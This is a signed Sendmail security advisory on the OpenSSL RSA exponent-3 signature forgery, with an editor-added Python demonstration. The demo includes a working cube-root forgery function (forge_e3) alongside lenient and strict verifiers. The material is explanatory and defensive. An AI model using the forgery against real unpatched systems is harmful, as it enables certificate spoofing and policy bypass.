-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
Sendmail-SA-200609-01                                      Security Advisory
                                                              Sendmail, Inc.

Topic:          OpenSSL RSA Signature Forgery
Class:          Policy Bypass
Severity:       High
Announced:      2006-10-02 09:00 PDT
Affects:        Sendmail Proxy 2.2.4 and earlier
                Sendmail Switch 3.2.4 and earlier
                Sendmail Switch for Windows 3.1.5 and earlier
                Sendmail Switch 3.1.10 and earlier
                Intelligent Quarantine 3.0 (includes Switch)
                Sendmail Advanced Message Store (SAMS) (includes Switch)
                Sendmail Sentrion 1.5.4 and earlier
                Mailstream Gatekeeper (includes Sentrion OS)
                Mailstream Governor (includes Sentrion OS)
                Sendmail Pro all versions
Resolved:       Sendmail Proxy 2.2.5
                Sendmail Switch 3.2.5
                Sendmail Switch for Windows 3.1.6
                Sendmail Switch 3.1.11
                Sendmail Sentrion 1.5.5

For general information regarding Sendmail, Inc. Security Advisories,
including descriptions of the fields above, other security advisories,
and the following sections, please see the Sendmail, Inc. security
advisories page.

I.   Background

Both the sendmail MTA (part of several Sendmail products such as Sendmail
Switch, Sendmail Advanced Message Store (SAMS), and Sentrion) and the
Sendmail Proxy server (included with Sendmail Advanced Message Store
(SAMS)) can accept SSL connections and validate client-side certificates
sent to the MTA or Proxy server. The MTA can also initiate SSL connections
and validate server-side certificates. Both are done with the OpenSSL
library.

II.  Problem Description

The OpenSSL Project recently released a security advisory announcing that
RSA signatures could be forged against public keys that use the exponent 3,
and therefore that certificates could be forged so that they appear to be
issued by a certificate authority whose key uses that exponent. OpenSSL's
signature check accepted a padded block whose DigestInfo was followed by
unchecked trailing bytes; with e = 3 an attacker can choose those bytes so
that the whole block is a perfect cube and take its cube root without the
private key. More details can be found in the OpenSSL advisory referenced
below.

III. Impact

The sendmail MTA and Sendmail Proxy server can optionally request and
validate an SSL certificate to identify the connecting client or server.
This validation is used to make policy decisions, such as whether to
accept the connection, allow relaying, digitally sign the message, etc.
Due to the OpenSSL bug, this validation can be subverted: an attacker who
presents a forged certificate chaining to an affected CA bypasses those
policy restrictions.

Note that this bug only affects sites that trust a certificate authority
whose RSA key uses the public exponent 3. Check the exponent of every CA
certificate the MTA or Proxy trusts (intermediate CAs included, since the
forgery applies to any signature verified with an exponent 3 key) with:

    /usr/local/sendmail/smmta-8.13/sbin/openssl x509 -text -in cacert.pem | grep Exponent

An affected CA prints "Exponent: 3 (0x3)"; the common "Exponent: 65537
(0x10001)" is not subject to this attack.

IV.  Workaround

If you are using an exponent 3 certificate authority and are unable to
install the patch immediately, you can work around this problem by
employing alternative methods of validating connections, such as SMTP
authentication for MTA related policy.

V.   Solution

Sendmail, Inc. has released patches for Sendmail Proxy, Switch, and
Sentrion to address this problem. The patch incorporates the software fix
provided by the OpenSSL project.

Those patches are available to supported customers on their download site
at:

    https://www.sendmail.com/customerlogin/

All customers can download the patches from:

    ftp://ftp.sendmail.com/patch/

Refer to the README included with each patch for installation
instructions.

The checksums for the available patches are:

MD5 (smproxy-patch-2.2.5-Linux.tar.gz)     = 35cfc377c0080102e7c125f4532a2679
MD5 (smproxy-patch-2.2.5-Solaris.tar.Z)    = 34f79cffe304a77b7e9304ac8d77f7f5
MD5 (smswitch-patch-3.1.6-Windows.zip)     = 66482522ae2825911affe95db467908b
MD5 (smswitch-patch-3.1.11-Linux.tar.gz)   = 9f1f595fca3ff5ddc84939fbdf2fffd9
MD5 (smswitch-patch-3.1.11-Solaris8.tar.Z) = 76072644f79d098dc5989c0ac4226bd8
MD5 (smswitch-patch-3.2.5-Linux.tar.gz)    = 6188c2f4d1aae41bc062278bd3dbfd60
MD5 (smswitch-patch-3.2.5-Solaris8.tar.Z)  = 90dc22433e492b4c40bc3869c72aef30
MD5 (SentriOS-1.5.5-906.tar)               = 0a73437a1b6c9f3c4912010b2084775c

Compare downloaded files against the checksums in this PGP-signed advisory
rather than against a checksum list served next to the files.

VI.  References

CVE:              http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339
OpenSSL Advisory: http://www.openssl.org/news/secadv_20060905.txt

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFFGxfbEEMlGKD4qgwRAvMuAJ9D+PLq41tJtoM1nLkbh0fiNhR1HgCgz8jU
vIa+GKZt0nMU4X/m50M1NFY=
=VUYG
-----END PGP SIGNATURE-----
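The forgery behind the Problem Description and Impact sections above, as a stand-alone demonstration added by the editor; it is not part of the advisory and is not Sendmail's or OpenSSL's code. verify_lenient models the class of check that was broken (parse the padding and DigestInfo from the left and never require the DigestInfo to end where the block ends); it is a model, not OpenSSL's source. forge_e3 is the cube-root construction from the referenced OpenSSL advisory (credited there to Daniel Bleichenbacher): the attacker fixes the bytes the lenient check reads, leaves the rest free, and takes an integer cube root, so no private key is used. The 2048-bit e = 3 key, the message, and all function names are constructed for this example; the genuine signing path exists only so the strict verifier can be seen accepting a real signature while rejecting the forgery.

```python
import hashlib
import secrets

# DER DigestInfo for SHA-1 (OID 1.3.14.3.2.26) without the trailing 20-byte digest.
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")


def pkcs1_v15_encode(msg: bytes, k: int) -> bytes:
    """EMSA-PKCS1-v1_5: 00 01 FF..FF 00 DigestInfo, exactly k bytes long."""
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    if k < len(t) + 11:
        raise ValueError("modulus too short for PKCS#1 v1.5 with SHA-1")
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def public_op(sig: bytes, n: int, e: int) -> bytes:
    """RSAVP1 then I2OSP: recover the k-byte encoded block from a signature."""
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")


def verify_lenient(msg: bytes, sig: bytes, n: int, e: int) -> bool:
    """Model of the pre-fix check: padding and DigestInfo are parsed from the
    left; whatever follows the digest is never examined (the bug)."""
    em = public_op(sig, n, e)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < len(em) and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= len(em) or em[i] != 0x00:   # at least 8 FF bytes, then 00
        return False
    t = SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t              # BUG: trailing bytes ignored


def verify_strict(msg: bytes, sig: bytes, n: int, e: int) -> bool:
    """Fixed check: re-encode and require the entire block to match."""
    em = public_op(sig, n, e)
    return em == pkcs1_v15_encode(msg, len(em))


def icbrt(x: int) -> int:
    """Floor of the integer cube root, by binary search on big integers."""
    lo, hi = 0, 1 << (x.bit_length() // 3 + 2)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def forge_e3(msg: bytes, n: int) -> bytes:
    """Forgery for e = 3 using only the public modulus: fix the bytes the lenient
    check reads (minimal padding + DigestInfo), leave the tail free, and find a
    perfect cube in that range. Fails when the free tail is too short."""
    k = (n.bit_length() + 7) // 8
    head = b"\x00\x01" + b"\xff" * 8 + b"\x00" + SHA1_DIGESTINFO + hashlib.sha1(msg).digest()
    free = 8 * (k - len(head))            # bits the lenient verifier never inspects
    lo = int.from_bytes(head, "big") << free
    s = icbrt(lo + (1 << free) - 1)       # largest s with s^3 below the range's end
    if s ** 3 < lo:
        raise ValueError("modulus too small: no perfect cube carries this prefix")
    return s.to_bytes(k, "big")           # s^3 < 2^(8k-8) <= n, so no modular reduction occurs


def is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin with random bases; adequate for a demonstration key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_e3_key(bits: int = 2048):
    """Constructed demonstration key with e = 3 (p, q = 2 mod 3 so 3 is
    invertible mod phi). Not for production use."""
    half, primes = bits // 2, []
    while len(primes) < 2:
        p = secrets.randbits(half) | (1 << (half - 1)) | 1
        if p % 3 == 2 and p not in primes and is_probable_prime(p):
            primes.append(p)
    p, q = primes
    return p * q, 3, pow(3, -1, (p - 1) * (q - 1))


def sign(msg: bytes, n: int, d: int) -> bytes:
    """Genuine RSASSA-PKCS1-v1_5 signature, used only to exercise the verifiers."""
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(pkcs1_v15_encode(msg, k), "big"), d, n).to_bytes(k, "big")


def demo() -> dict:
    """Genuine signature vs. forgery under both verifiers (constructed sample)."""
    n, e, d = generate_e3_key()
    msg = b"CN=victim.example, constructed to-be-signed certificate bytes"
    good, forged = sign(msg, n, d), forge_e3(msg, n)
    return {
        "genuine_lenient": verify_lenient(msg, good, n, e),
        "genuine_strict": verify_strict(msg, good, n, e),
        "forged_lenient": verify_lenient(msg, forged, n, e),
        "forged_strict": verify_strict(msg, forged, n, e),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:16s} {'accepted' if ok else 'rejected'}")
```

Running it shows the lenient verifier accepting both the genuine signature and the forgery, while the strict verifier accepts only the genuine one. The construction needs a free tail wide enough to contain a perfect cube, which a 2048-bit key provides; it does not apply to e = 65537, where no cheap root exists, which is why the advisory's exponent check is the right triage step.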